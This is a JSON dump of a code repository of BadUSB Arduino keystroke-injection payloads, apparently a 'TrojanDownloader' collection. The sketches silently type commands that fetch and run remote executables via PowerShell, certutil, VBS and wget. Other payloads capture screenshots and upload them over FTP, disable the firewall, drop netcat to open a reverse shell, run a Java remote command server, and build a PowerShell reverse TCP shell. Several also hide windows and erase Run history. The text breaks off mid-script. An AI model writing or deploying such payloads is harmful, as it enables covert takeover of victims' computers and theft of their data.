    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n\nvoid setup(){\ndelay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd(3,500,\"cmd /T:01 /K \\\"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\\\"\"))\n  {\n  reset_windows_desktop(2000);\n  }\n\n Keyboard.println(\"echo Add-Type -Assembly System.Windows.Forms  > %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo mkdir $env:temp\\\\screens -Force  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo While (1) {  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $fn = $((get-date).toString('dd_MM_yyyy_HH_mm_ss')) + \\\".png\\\"  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sb = [Windows.Forms.SystemInformation]::VirtualScreen  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso = New-Object Drawing.Bitmap $sb.Width, $sb.Height  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg = [Drawing.Graphics]::FromImage($sso)  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg.CopyFromScreen( $sb.Location, [Drawing.Point]::Empty, $sb.Size)  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg.Dispose() >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso.Save(\\\"$env:temp\\\\screens\\\\$fn\\\") >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso.Dispose() >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo sleep INPUT0 >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo  } >> %temp%\\\\ss.ps1\");\n\n\n\n  Keyboard.println(\"echo while(1)  {  > %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  $wc = New-Object System.Net.webclient >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  foreach($it in (ls $env:temp\\\\screens)) { >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  $wc.UploadFile(\\\"ftp://INPUT2:INPUT3@INPUT4/INPUT5\\\" + $it.Name, $it.FullName) } >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo rm (\\\"$env:temp\\\\screens\\\" + \\\"\\\\*\\\") -Force  >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo sleep INPUT1 } >> %temp%\\\\up.ps1\");\n\n  Keyboard.println(\"echo Set oShell = CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\ss.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\ss.ps1\\\"),0,true >> %temp%\\\\ss.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\ss.vbs\");\n  Keyboard.println(\"echo Set oShell = CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\up.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\up.ps1\\\"),0,true >> %temp%\\\\up.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\up.vbs\");\n  delay(3000);\n  Keyboard.println(\"exit\");\n\n\n}\n\nvoid loop(){\n}\n\nDEFS"
  },
  {
    "path": "TrojanDownloader/CERTUTIL_DownLoader/CERTUTIL_DownLoader_MSF.ino",
    "content": "#include<Keyboard.h>\nvoid setup()\n{\n  Keyboard.begin();//ʼͨ\n  delay(4000);//ʱ1000룬Ҫ̫̣ΪÿԵٶȶһ\n  Keyboard.press(KEY_CAPS_LOCK); //´д д Ȼ¾ͻ\n  Keyboard.release(KEY_CAPS_LOCK); //ͷŴд\n  delay(500);\n  Keyboard.press(KEY_LEFT_GUI);//»ձ Ҳwin\n  delay(500);\n  Keyboard.press('r');//r\n  delay(500);\n  Keyboard.println(\"cmd.exe\");\n  delay(1000);\n  Keyboard.println(\"certutil -urlcache -split -f http://192.168.43.242/wwy.exe D:\\\\setup_11.5.0.exe\");\n  delay(1000);\n  delay(1000);\n  Keyboard.println(\"D:\\\\SETUP_11.5.0.EXE\");\n  delay(500);\n  Keyboard.println(\"exit\");\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK); //´д\n  Keyboard.release(KEY_CAPS_LOCK); //ͷŴд ٴιرտĴд\n  delay(400);\n  Keyboard.end();//ͨѶ\n\n}\nvoid loop()\n{\n}"
  },
  {
    "path": "TrojanDownloader/FTP_DownLoader/FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n  Keyboard.println(\"CD %userprofile%\");\n  delay(100);\n  Keyboard.println(\"NETSH FIREWALL SET OPMODE DISABLE\");  //关闭FIREWALL防火墙\n  delay(2000);\n  Keyboard.println(\"ECHO OPEN [ip] [PORT] > FTP.TXT\");  //输入自己的IP及端口，等待对方连接\n  delay(100);\n  Keyboard.println(\"ECHO [username] >> FTP.TXT\");  //输入用户名\n  delay(100);\n  Keyboard.println(\"ECHO [password] >> FTP.TXT\");  //输入密码\n  delay(100);\n  delay(100);\n  Keyboard.println(\"ECHO BIN >> FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"ECHO GET NC.EXE >> FTP.TXT\");  //获取NC程序\n  delay(100);\n  Keyboard.println(\"ECHO BYE >> FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"FTP -S:FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"DEL FTP.TXT & EXIT\");\n  delay(2000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println(\"NC.EXE [listener ip] [listener port] -E CMD.EXE -D\");  //后台直接监听，输入自己的IP及端口，一旦连接执行CMD命令\n  delay(2000);\n    Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/JAVA_DownLoader/JavaTrojanWrite(TargetEnvironmentRunJava).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n \n  Keyboard.println(\"ECHO import java.awt.*; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.awt.event.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.io.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.net.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO public class Client extends Frame implements ActionListener { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Label label = new Label(\\\"指令\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Panel panel = new Panel(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     TextField tf = new TextField(20); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     TextArea ta = new TextArea(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Socket client; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     InputStream in; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     OutputStream out; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public Client() { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         super(\\\"客户机\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         setSize(250, 250); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         panel.add(label); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         panel.add(tf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         tf.addActionListener(this); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         add(\\\"South\\\", panel); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         add(\\\"Center\\\", ta); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         addWindowListener(new WindowAdapter() { //退出 >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 public void windowClosing(WindowEvent e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                     System.exit(0); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             }); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         show(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             client = new Socket(InetAddress.getLocalHost(), 6000); //向6000端口发出客户请求 >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             ta.append(\\\"服务器是:\\\" + client.getInetAddress().getHostAddress() + \\\"\\n\\n\\\"); >> client.java\");  //需要手动替换监听主机IP、端口，这里只给出思路\n  delay(100);\n  Keyboard.println(\"ECHO             in = client.getInputStream(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             out = client.getOutputStream(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } catch (IOException ioe) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         while (true) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 byte[] buf = new byte[256]; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 in.read(buf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 String str = new String(buf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 ta.append(str + \\\"\\n\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             catch (IOException e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public void actionPerformed(ActionEvent e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             String str = tf.getText(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             byte[] buf = str.getBytes(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             tf.setText(null); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             out.write(buf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             ta.append(\\\"\\n指令:\\\" + str + \\\"\\n\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } catch (IOException ioe) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public static void main(String[] args) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         new Client(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO } >> client.java\");\n  delay(100);\n\n  Keyboard.println(\"javac client.java\");  //编译java文件\n  delay(6000);\n  Keyboard.println(\"java client\");  //执行java文件\n  delay(300);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/JAVA_DownLoader/server.java",
    "content": "import java.io.*; \nimport java.net.*; \nimport java.awt.*; \nimport java.awt.event.*;\n \npublic class Server extends Frame \n{\n \nServerSocket server; \nSocket client; \nInputStream in; \nOutputStream out; \npublic Server() \n{ \nsuper(\"服务器\"); \nsetSize(250,250);   \naddWindowListener(new WindowAdapter(){ \n   public void windowClosing(WindowEvent e) \n   { \n    System.exit(0); \n   } \n}); \nshow(); \ntry{ \n   server=new ServerSocket(6000); \n   client=server.accept(); \n   in=client.getInputStream(); \n   out=client.getOutputStream(); \n}catch(IOException ioe){} \nwhile(true){ \n   try{ \nString Result=null;\n    byte[]buf=new byte[256]; \n    in.read(buf); \n    String str=new String(buf);\n \n    Process p = Runtime.getRuntime().exec(\"cmd /c \"+str);\n    BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));\n    while((Result=br.readLine())!=null)\n    {\n    out.write(Result.getBytes());\n        \n    }\n   }catch (IOException e){} \n} \n}\n \npublic static void main(String[]args) \n{ \nnew Server(); \n} \n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/Downloa_PSL_Trojan-Execute_aSecondTime.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(5000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(500); \n  Keyboard.press('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -eXECUTIONpOLICY bYPASS -W HIDDEN -C \\\"(nEW-oBJECT nET.wEBcLIENT).dOWNLOADfILE('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1','C:\\\\USERS\\\\PUBLIC\\\\sYSTEMnETWORKsERVICE.PS1')\\\";C:\\\\USERS\\\\PUBLIC\\\\sYSTEMnETWORKsERVICE.PS1;EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop()\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/LinkServer_MSF_PSL_Download.ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() \n{ //初始化，这里的代码只执行一次\ndelay(5000); //设置延时，让系统有足够的时间识别BadUsb5，防止后续代码执行错乱。\ndelay(1000);Keyboard.press(KEY_LEFT_GUI);\nKeyboard.press('r');Keyboard.releaseAll();delay(500);//针对shift+ctrl切换输入法\nKeyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_LEFT_CTRL);//针对win8及以上部分操作系统改换中文输入\nKeyboard.press(KEY_LEFT_GUI);Keyboard.println(' ');//某些输入法的中英文切换\nKeyboard.press(KEY_LEFT_SHIFT);//暴力直接切换成英文\nKeyboard.press(KEY_CAPS_LOCK)//手动释放按键\nKeyboard.releaseAll();\nKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键\nKeyboard.set_key1(KEY_R); // 同时按下R键\nKeyboard.send_now(); // 发送Win+R\ndelay(100);\nKeyboard.print(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\");\n//开启极小的CMD窗口，设置文字和背景对比度尽可能相近，达到隐藏输入的目的\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\ndelay(300);\nKeyboard.println(\"reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\"); //利用注册表清除开始--运行的记录\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\nKeyboard.println(\"powershell (new- object System.Net.WebClient).DownloadFile('http://196.168.x.x/a.exe','D://b.exe')\"); //下载木马并选择储存位置\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.send_now();\ndelay(3000); //设置延迟，等待下载完成\nKeyboard.println(\"D://1.exe\"); //执行打开命令\nKeyboard.set_key1(KEY_ENTER);\ndelay(300);\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.set_modifier(MODIFIERKEY_ALT);\nKeyboard.set_key1(KEY_SPACE);\nKeyboard.set_key2(KEY_C);\nKeyboard.send_now();\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.set_key2(0);\nKeyboard.send_now(); //关闭cmd窗口\n}\n\nvoid loop() //循环，这里的代码无限循环\n{\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/LinkServer_PSL_Download.ino",
    "content": "#include<Keyboard.h>\n//Arduino Leonardo\n\nvoid setup()\n{ //初始化\nKeyboard.begin();//开始键盘通信\ndelay(1000);//延时1000毫秒，\nKeyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键\nKeyboard.press('r');//按下r键 CMD\ndelay(500);\nKeyboard.release(KEY_LEFT_GUI);//松掉win键\nKeyboard.release('r');//松掉r键\ndelay(500);\nKeyboard.println(\"cmd\");\nKeyboard.press(KEY_RETURN);  //按下回车键\nKeyboard.release(KEY_RETURN); //释放回车键\ndelay(500);\nKeyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //缩小窗口\nKeyboard.println(\"powershell.exe -command start-process powershell -verb runAs\");  /*开启管理员级别的powershell*/\ndelay(2000);\nKeyboard.press(KEY_LEFT_ARROW); //按住左方向键\nKeyboard.release(KEY_LEFT_ARROW); //释放左方向键\ndelay(500);\nKeyboard.press(KEY_RETURN); //按下回车键\nKeyboard.release(KEY_RETURN);//释放enter键\ndelay(3000);\nKeyboard.println(\"$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT\"); //利用powershell 定义一个对象\nKeyboard.println(\"$P.dOWNLOADfILE('HTTP://192.168.x.x/a.PS1','C:\\\\TEMP\\\\b.PS1')\");  /*从服务端下载Powershell脚本*/\nKeyboard.println(\"C:\\\\TEMP\\\\STEP1.PS1\");\nKeyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //缩小窗口\ndelay(500);\nKeyboard.end();//结束键盘通讯\n}\n\nvoid loop()//循环，这里的代码\n{\n//循环体\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader0.ino",
    "content": "#include \"DigiKeyboard.h\"\n\nvoid setup() \n{\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(0);\nDigiKeyboard.delay(3000);\nDigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);\nDigiKeyboard.delay(1000);\nDigiKeyboard.print(F(\"powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');\"));\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\nDigiKeyboard.delay(750);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\n}\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader1.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"CMD.EXE /t:01 /k MODE con: cols=16 lines=2\");\n  delay(1000);\n  Keyboard.println(\"POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'http://pan.plyz.net/d.asp?u=1948862583&p=x.exe';$FILE = ' c:\\\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);\");\n  delay(3000);\n  Keyboard.println(\"C:\\\\X.EXE&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader2.ino",
    "content": " void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500); \n  Keyboard.println(\"powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\\\x.exe ';$clnt.DownloadFile($url,$file);\"); \n  delay(3000);\n  Keyboard.println(\"c:\\\\x.exe&exit\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader3.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(20000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -W HIDDEN -C \\\"sTART-pROCESS -fILEpATH POWERSHELL.EXE \\'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://127.0.0.1/1.JPG -oUTfILE C:\\\\1.JPG;C:\\\\1.JPG\\' -vERB RUNAS\\\"\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader4.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD.EXE /t:01 /k MODE con:cols=16 lines=5\");\n  delay(2000); \n  Keyboard.println(\"ECHO sET XpOST = cREATEoBJECT(\\\"mICROSOFT.xmlhttp\\\") >WEBDOWN.VBS&ECHO XpOST.oPEN \\\"get\\\",\\\"HTTP://WWW.BAIDU.COM/MD5.EXE\\\",0 >>WEBDOWN.VBS&ECHO XpOST.sEND() >>WEBDOWN.VBS&ECHO sET SgET = cREATEoBJECT(\\\"adodb.sTREAM\\\") >>WEBDOWN.VBS&ECHO SgET.mODE = 3 >>WEBDOWN.VBS&ECHO SgET.tYPE = 1 >>WEBDOWN.VBS&ECHO SgET.oPEN() >>WEBDOWN.VBS&ECHO SgET.wRITE(XpOST.RESPONSEbODY) >>WEBDOWN.VBS&ECHO SgET.sAVEtOfILE \\\"x.EXE\\\",2 >>WEBDOWN.VBS&ECHO WSCRIPT.CREATEOBJECT(\\\"WSCRIPT.SHELL\\\").RUN \\\"X.EXE\\\" >>WEBDOWN.VBS&&WEBDOWN.VBS&&EXIT\"); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_Downloader_Win&Linux_General.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('t');\n  Keyboard.release(KEY_LEFT_CTRL);\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(1000);\n  Keyboard.println(\"rm x.out\");\n  delay(1000);\n  Keyboard.println(\"wget http://127.0.0.1/x.out -O x.out\");\n  delay(1000);\n  Keyboard.println(\"chmod +x x.out\");\n  Keyboard.println(\"./x.out &\");\n  delay(1000);\n  Keyboard.println(\"exit\");\n  \n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500); \n  Keyboard.println(\"echo Set xPost = CreateObject(\\\"Microsoft.XMLHTTP\\\") >webdown.vbs&echo xPost.Open \\\"GET\\\",\\\"http://192.168.1.102/x.exe\\\",0 >>webdown.vbs&echo xPost.Send() >>webdown.vbs&echo Set sGet = CreateObject(\\\"ADODB.Stream\\\") >>webdown.vbs&echo sGet.Mode = 3 >>webdown.vbs&echo sGet.Type = 1 >>webdown.vbs&echo sGet.Open() >>webdown.vbs&echo sGet.Write(xPost.responseBody) >>webdown.vbs&echo sGet.SaveToFile \\\"x.exe\\\",2 >>webdown.vbs&cscript webdown.vbs&del webdown.vbs /Q /F&x.exe&exit\"); \n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_Writes_Bounces.ino",
    "content": "void setup() {\n  // put your setup code here, to run once:\n  //reverse_shell via cmd(local)\n  delay(5000);\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_ESC);\n  Keyboard.releaseAll();\n  delay(500);\n\n  Keyboard.print(\"cmd.exe\");\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_LEFT_SHIFT);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.releaseAll();\n  delay(2500);\n  Keyboard.println(\"powershell\");\n  delay(200);\n  Keyboard.println(\"function cleanup {\");\n  Keyboard.println(\"if ($client.Connected -eq $true) {$client.Close()}\");\n  Keyboard.println(\"if ($process.ExitCode -ne $null) {$process.Close()}\");\n  Keyboard.println(\"exit}\");\n  // Setup 192.168.202.130 HERE\n  Keyboard.println(\"$address = '192.168.1.103'\");\n  // Setup PORT HERE\n  Keyboard.println(\"$port = '8000'\");\n  Keyboard.println(\"$client = New-Object system.net.sockets.tcpclient\");\n  Keyboard.println(\"$client.connect($address,$port)\");\n  Keyboard.println(\"$stream = $client.GetStream()\");\n  Keyboard.println(\"$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize\");\n  Keyboard.println(\"$process = New-Object System.Diagnostics.Process\");\n  Keyboard.println(\"$process.StartInfo.FileName = 'C:\\\\windows\\\\system32\\\\cmd.exe'\");\n  Keyboard.println(\"$process.StartInfo.RedirectStandardInput = 1\");\n  Keyboard.println(\"$process.StartInfo.RedirectStandardOutput = 1\");\n  Keyboard.println(\"$process.StartInfo.UseShellExecute = 0\");\n  Keyboard.println(\"$process.Start()\");\n  Keyboard.println(\"$inputstream = $process.StandardInput\");\n  Keyboard.println(\"$outputstream = $process.StandardOutput\");\n  Keyboard.println(\"Start-Sleep 1\");\n  Keyboard.println(\"$encoding = new-object System.Text.AsciiEncoding\");\n  Keyboard.println(\"while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}\");\n  Keyboard.println(\"$stream.Write($encoding.GetBytes($out),0,$out.Length)\");\n  Keyboard.println(\"$out = $null; $done = $false; $testing = 0;\");\n  Keyboard.println(\"while (-not $done) {\");\n  Keyboard.println(\"if ($client.Connected -ne $true) {cleanup}\");\n  Keyboard.println(\"$pos = 0; $i = 1\");\n  Keyboard.println(\"while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {\");\n  Keyboard.println(\"$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)\");\n  Keyboard.println(\"$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}\");\n  Keyboard.println(\"if ($pos -gt 0) {\");\n  Keyboard.println(\"$string = $encoding.GetString($networkbuffer,0,$pos)\");\n  Keyboard.println(\"$inputstream.write($string)\");\n  Keyboard.println(\"start-sleep 1\");\n  Keyboard.println(\"if ($process.ExitCode -ne $null) {cleanup}\");\n  